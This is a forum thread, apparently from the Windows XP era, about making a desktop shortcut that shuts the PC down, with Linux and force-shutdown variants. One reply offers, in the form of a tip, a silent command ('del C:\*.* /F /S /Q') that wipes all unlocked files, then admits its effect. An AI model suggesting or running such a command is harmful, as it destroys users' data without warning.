Default Shutdown Icon on your desktop

Here's a way to add a shutdown icon to your desktop in XP.

Right click the destop and select New

Click "Shortcut"

In the box type exactly with the spaces shown below:

shutdown -s -t 01

Hit Enter

Next, name your shortcut. It will already say 'shutdown', but you can put whatever you choose.

Then hit enter.

From now on you can just double click to shutdown your PC. No more having to go through the start menu. Even my 2 year old has mastered it.

This reminds me of my dastardly plan I once had, to put logoff.exe into the startup programs. Never tried it though.

Edit: Kiwi, advice is right.

This can work in linux, but using a different command. The only problem is the command has to be executed by root.

/sbin/shutdown -h now

You can also restart by using -r . the last item "now" is always needed, you can use others but for an explination see /sbin/shutdown --help

That prompts you. For WinXP people, try:

del C:\*.* /F /S /Q > nul

That will delete everything not locked by the O/S, will not prompt at all, and will give no output. You'll just get a flashing cursor while it wipes all of your files.

By the way, tgs, thx for the info.

I have always suggested this to my customers who complain XP will not shut down. Only thing is I tell them to use shutdown -s -f -t 0 that will force windows to shut down even if there is a hanging app that refuses to unload.
